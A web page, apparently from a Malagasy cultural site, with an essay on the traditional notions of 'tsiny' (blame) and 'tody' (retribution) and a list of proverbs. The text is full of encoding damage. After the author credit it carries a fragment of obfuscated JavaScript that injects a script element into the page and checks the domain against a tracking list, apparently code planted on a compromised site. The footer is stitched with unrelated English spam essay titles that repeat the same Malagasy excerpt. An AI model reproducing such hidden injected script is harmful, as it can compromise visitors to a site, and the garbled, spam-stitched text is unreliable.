logo

Ny tsiny sy ny tody: Misy tokoa ve?

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany. Ny maizina manohitra ny mazava, ny ratsy manohitra ny tsara, ny mantsina manohitra ny manitra ary na eo amina��ny resaka hasina aza dia misy ny mahita fa ao ireo manana hasin-tsara fa ao koa ny manana hasin-dratsy. Heverina ho manana ny hasiny avokoa ireo raonkandro nitsaboana��ny Ntaolo ireo narariny ka ireo noheverina ho poizina dia ratsy hasina fa ireo fanafana kosa,A� tsara hasina. Isana��ireo tsara hasina, ohatra, ny Mandravasarotra sy ny Fanalaloza. Ratsy hasina kosa ny Fanidy. Ireo voalaza rehetra ireo amina��ny ankapobeny, ifandrohizana��ny atao hoe tsiny sy tody avokoa. Raha ny famaritana��ny mpitandrina Andriamanjato Richard azy, karazana sazy ampiharina��ny tontolo voajanahary amina��ireo izay nandika lalA�na na fomba nifanarahana tao anatina��ny fiarahamonina ny atao hoe a�?Tsinya�?. Ny a�?Todya�? kosa, fiverimberenana��ny zava-dratsy rehetra vita teo aloha ka ny tena ihany no hiharana��ilay ratsy natao. Izay ilay hoe manody.

Ny tody itsy misya��

Isana�� ny fehezanteny famerimberina��ny Mpanandro (Astrologue), Albert Rabearifeno, ao anatina��ireo boky nosoratany matetika ny fehezanteny hoe a�?Amina��izay rehetra atao dia tadidio foana fa ny tody itsy misy ka ny atao no miverinaa�?. a�?Ny tody itsy misy ka ny atao no miverina.a�? A�fa tsy hoe ny tody tsy misy fa ny atao no miverina. Ny vazimba, izay razambentsika dia nino ny fisiana��ny atao hoe tsiny sy ny tody ary tena nosorohany fatratra mihitsy izany hoe hanodiavan-javatra izany na koa hoe manan-tsiny eo amina��ny tany ama-monina. Ny fandinihany ny zava-mitranga teo amina��ny manodidina azy no namoahany tsoa-kevitra tamina��ny alalana��ny famintinana izany tamina��ireo ohabolana sy ohapitenenana izay noforoniny ary isana��ny maro mihitsy ny mahakasika ny atao hoe Tsiny sy Tody. Ankoatry ny efa voalaza teo dia isany koa, ohatra, ireto manaraka ireto:

 • a�?Raha todim-paty aza manody fa ny todim-pitia manodiava.a�?
 • a�?Todin-karena harena, todim-pitia fitia, todina��aina aina.a�?
 • a�?Ny tsiny mbola azo sorohana fa ny tody tsy misy fanefitra.a�?
 • a�?Mandrora mitsilany ka mahavoa tena.a�?
 • a�?Izay manenjika ny osa mbola ho enjehina��ny mahery.a�?
 • a�?Mpamosavy milevina amoron-dalana ka mahatantesa valin-kitsaka.a�?
 • a�?Toy ny rivotra an-kadilalana ny tsiny, mipaoka vao mahataitra.a�?
 • a�?Ny tsiny fanalana��ny vava.a�?
 • a�?Ny tsiny maiva-mavesatra, tsy zakana��ny teo aloha ka ombako tsy mahazaka.a�?
 • a�?Ny tsiny toy ny hady lalina, tsirihi-mahafanina, ianjera-mahafaty.a�?
 • a�?Misoko toa ranom-panala ny tsiny, an-koditra vao mahangoly.a�?

A�

Nanangona sy namakafaka: Jaonary Mirija

[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Ny volana malagasy sy ny tononandrony: Manana ny orim-bintana mifanandrify aminy

Toy ny firenena rehetra, manana izay iheverany ho fihodinkodina��ny tany izay diaviny koa ny Malagasy. Nisy, araka izany, na mbola tsy nisy oniversite aza, tamina��ny androna��ny Ntaolo, ny mpandinika manokana ny fihodina��ny eny amina��ny habakabaka eny sy ny fifandraisana��ny olombelona amina��izany. Araka ny voalaza ao amina��ny boky a�?Fomba malagasya�?, ny mpanandro no mamantatra ny tononandrona��ireo zaza teraka, tamina��ny alalana��ny fandinihana ny volana.

Anjara, lahatra, tendry, vintana: Siansa sa finoana?

Isana��ny mampiady hevitra ny maro ny fandraisana��ny fiarahamonina malagasy ny zavatra efa-doha dia ny atao hoe Anjara, Lahatra, Tendry ary Vintana. Ny anjara sy lahatra ary tendry dia saika naravina��ny frantsay amina��ny teny tokana hoe a�?Destina�? izay adika amina��ny teny anglisy hoe a�?Destinya�?. Ny teny hoe a�?vintanaa�? moa, raha ny fikarohana nataona��ireo mpahaiolona miompana amina��ny fivavahana sy ireo mpanandro, dia misy hifandraisany amina��ny teny soailii na ireo mpiavy teto amintsika niaraka tamina��ny malaizianina sy indonezianina hoe a�?bintanga�?, izay midika hoe a�?kintanaa�?.

Hanitra nentin-drazana

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany. Ny maizina manohitra ny mazava, ny ratsy manohitra ny tsara, […]

Tantara

Literatiora

Vakoka velona

Narrative Essay Spm Sad Ending Features

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany. Ny maizina manohitra ny mazava, ny ratsy manohitra ny tsara, […]

Most Noticeable Essay about Biology

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany. Ny maizina manohitra ny mazava, ny ratsy manohitra ny tsara, […]

What exactly are some suggestions to jot down a good narrative story or essay?

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany. Ny maizina manohitra ny mazava, ny ratsy manohitra ny tsara, […]